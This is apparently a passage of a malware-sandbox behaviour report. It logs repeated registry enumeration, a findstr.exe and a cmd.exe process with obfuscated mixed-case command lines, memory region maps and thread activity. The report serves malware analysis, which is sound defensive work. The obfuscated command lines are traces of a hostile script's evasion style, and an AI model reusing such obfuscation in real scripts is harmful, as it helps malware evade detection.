Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\Software\Classes	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	1	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn

Process #10: findstr.exe

0

»

Information	Value
ID	#10
File Name	c:\windows\system32\findstr.exe
Command Line	fiNdStr cm
Initial Working Directory	C:\Users\aETAdzjz\Desktop\
Monitor	Start Time: 00:01:42, Reason: Child Process
Unmonitor	End Time: 00:01:44, Reason: Self Terminated
Monitor Duration	00:00:02
Remark	No high level activity detected in monitored regions

OS Process Information

»

Information	Value
PID	0xb34
Parent PID	0xb24 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x B38

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x00044fff	Private Memory	rw	-
pagefile_0x0000000000050000	0x00050000	0x00053fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000060000	0x00060000	0x00060fff	Pagefile Backed Memory	r	-
private_0x00000000001b0000	0x001b0000	0x0022ffff	Private Memory	rw	-
ntdll.dll	0x77c40000	0x77de8fff	Memory Mapped File	rwx	-
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	r	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	r	-
findstr.exe	0xff910000	0xff925fff	Memory Mapped File	rwx	-
apisetschema.dll	0x7fefff60000	0x7fefff60fff	Memory Mapped File	rwx	-
pagefile_0x000007fffffb0000	0x7fffffb0000	0x7fffffd2fff	Pagefile Backed Memory	r	-
private_0x000007fffffdd000	0x7fffffdd000	0x7fffffdefff	Private Memory	rw	-
private_0x000007fffffdf000	0x7fffffdf000	0x7fffffdffff	Private Memory	rw	-

Process #11: cmd.exe

51

0

»

Information	Value
ID	#11
File Name	c:\windows\system32\cmd.exe
Command Line	C:\Windows\system32\cmd.exe /S /D /c" echO ,%*[-,% "
Initial Working Directory	C:\Users\aETAdzjz\Desktop\
Monitor	Start Time: 00:01:43, Reason: Child Process
Unmonitor	End Time: 00:01:44, Reason: Self Terminated
Monitor Duration	00:00:01

OS Process Information

»

Information	Value
PID	0xb3c
Parent PID	0xb04 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x B40

Region

»

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x00044fff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000020000	0x00020000	0x0002ffff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000030000	0x00030000	0x00036fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000040000	0x00040000	0x00041fff	Pagefile Backed Memory	rw	-
private_0x0000000000050000	0x00050000	0x0014ffff	Private Memory	rw	-
pagefile_0x0000000000150000	0x00150000	0x00153fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000160000	0x00160000	0x00160fff	Pagefile Backed Memory	r	-
private_0x0000000000170000	0x00170000	0x00170fff	Private Memory	rw	-
private_0x0000000000180000	0x00180000	0x00180fff	Private Memory	rw	-
private_0x00000000001c0000	0x001c0000	0x002bffff	Private Memory	rw	-
locale.nls	0x002c0000	0x00326fff	Memory Mapped File	r	-
private_0x0000000000410000	0x00410000	0x0041ffff	Private Memory	rw	-
private_0x0000000000420000	0x00420000	0x0051ffff	Private Memory	rw	-
pagefile_0x0000000000520000	0x00520000	0x006a7fff	Pagefile Backed Memory	r	-
pagefile_0x00000000006b0000	0x006b0000	0x00830fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000840000	0x00840000	0x01c3ffff	Pagefile Backed Memory	r	-
pagefile_0x0000000001c40000	0x01c40000	0x01f82fff	Pagefile Backed Memory	r	-
private_0x0000000001f90000	0x01f90000	0x0208ffff	Private Memory	rw	-
cmd.exe	0x4a0b0000	0x4a108fff	Memory Mapped File	rwx	-
user32.dll	0x77a20000	0x77b19fff	Memory Mapped File	rwx	-
kernel32.dll	0x77b20000	0x77c3efff	Memory Mapped File	rwx	-
ntdll.dll	0x77c40000	0x77de8fff	Memory Mapped File	rwx	-
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	r	-
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	r	-
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	r	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	r	-
winbrand.dll	0x7fef59a0000	0x7fef59a7fff	Memory Mapped File	rwx	-
kernelbase.dll	0x7fefdd60000	0x7fefddcafff	Memory Mapped File	rwx	-
gdi32.dll	0x7fefdf60000	0x7fefdfc6fff	Memory Mapped File	rwx	-
imm32.dll	0x7fefed60000	0x7fefed8dfff	Memory Mapped File	rwx	-
msctf.dll	0x7feff1e0000	0x7feff2e8fff	Memory Mapped File	rwx	-
usp10.dll	0x7feff4d0000	0x7feff598fff	Memory Mapped File	rwx	-
msvcrt.dll	0x7feff5a0000	0x7feff63efff	Memory Mapped File	rwx	-
lpk.dll	0x7feff860000	0x7feff86dfff	Memory Mapped File	rwx	-
apisetschema.dll	0x7fefff60000	0x7fefff60fff	Memory Mapped File	rwx	-
pagefile_0x000007fffffb0000	0x7fffffb0000	0x7fffffd2fff	Pagefile Backed Memory	r	-
private_0x000007fffffd3000	0x7fffffd3000	0x7fffffd3fff	Private Memory	rw	-
private_0x000007fffffde000	0x7fffffde000	0x7fffffdffff	Private Memory	rw	-

Threads

Thread 0xb40

51

0

»

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2018-11-06 10:24:16 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 141321	1	Fn
Module	Get Handle	module_name = c:\windows\system32\cmd.exe, base_address = 0x4a0b0000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x77b20000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x77b36d40	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
